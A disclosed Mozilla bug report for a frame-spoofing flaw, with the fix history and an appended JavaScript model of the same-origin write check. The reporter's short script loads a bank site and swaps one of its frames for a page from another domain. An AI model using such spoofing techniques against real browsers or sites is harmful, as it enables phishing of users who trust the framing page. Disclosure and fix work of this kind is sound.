Closed Bug 20682 Opened 21 years ago Closed 20 years ago

Frame spoofing #2

Categories: Core :: Security, defect, P3
Platform: x86, Windows 95
Status: VERIFIED FIXED
Reporter: joro
Assigned: security-bugs
Whiteboard: [nsbeta2+]


There is a vulnerability that allows spoofing frames.
The code is:
------------------------------------------
<SCRIPT>
b=window.open("http://www.citybank.com");
setTimeout('b.frames[2].location="http://www.mozilla.org";',6000);
</SCRIPT>
------------------------------------------
Communicator 4.7 gives a security error on this.
Status: NEW → ASSIGNED
Target Milestone: M15
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Keywords: beta2
I don't see signs of progress for M15, and since Norris is out this week, I'm 
pushing this to M16 (so that we can branch).
Target Milestone: M15 → M16
Target Milestone: M16 → M17
Keywords: nsbeta2
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]
Changed QA contact to Cathy.
QA Contact: junruh → czhang
I have reproduced this bug. Looks like, for whatever reason, we don't check
writing to "location", only reading.
Status: NEW → ASSIGNED
Assigning QA to czhang
This will be fixed by defaulting to sameOrigin; otherwise, we need to check
location.href.write as well as .read.
Group: netscapeconfidential?
Depends on: 28443
Looks fixed with 7/6 build on NT. Try new testcase:
http://rocknroll/users/jtaylor/publish/TestCases/xdomain/frames.html
Fix confirmed by jtaylor. Marking FIXED.
Status: ASSIGNED → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
verified
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Test for this got added in bug 408052.
Flags: in-testsuite+
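
The missing write check and the sameOrigin default discussed in the comments above, as a simplified model added here (not Mozilla's code; the policy table, the function names and the `.example` URLs are assumptions made for illustration):

```javascript
// Simplified model of a per-property access policy table. All names are
// hypothetical; this is not the browser's actual data structure.
const ALL_ACCESS = "allAccess";
const SAME_ORIGIN = "sameOrigin";

// Constructed table matching the diagnosis in the comments: a rule exists
// for reading location, but none was ever written for assigning to it.
const explicitRules = { "location.href.read": SAME_ORIGIN };

// Build a checker whose behaviour for unlisted property/mode pairs is
// decided by the default policy.
function makeChecker(defaultPolicy) {
  return function canAccess(callerUrl, targetUrl, property, mode) {
    const policy = explicitRules[`${property}.${mode}`] ?? defaultPolicy;
    if (policy === ALL_ACCESS) return true;
    // Same origin means scheme, host and port all match.
    return new URL(callerUrl).origin === new URL(targetUrl).origin;
  };
}

// Before the fix: unlisted accesses fall through to "allow".
const beforeFix = makeChecker(ALL_ACCESS);
// After the fix: unlisted accesses default to sameOrigin.
const afterFix = makeChecker(SAME_ORIGIN);

// Model of `frame.location = newUrl` issued by a script running at callerUrl.
// Returns true if the frame was navigated, false if the check refused it.
function assignFrameLocation(check, callerUrl, frame, newUrl) {
  if (!check(callerUrl, frame.url, "location.href", "write")) return false;
  frame.url = newUrl;
  return true;
}

// Constructed sample: a script on one site holds a reference to a frame
// inside a window showing another site.
const opener = "http://opener.example/page.html";
const frameA = { url: "http://framed-site.example/menu.html" };
const frameB = { url: "http://framed-site.example/menu.html" };

console.log("before fix, cross-origin write navigates frame:",
  assignFrameLocation(beforeFix, opener, frameA, "http://other.example/"));
console.log("after fix, cross-origin write navigates frame:",
  assignFrameLocation(afterFix, opener, frameB, "http://other.example/"));
```

With the restrictive default, a property that nobody wrote a rule for fails closed, so a forgotten entry such as the location write no longer becomes a cross-origin hole.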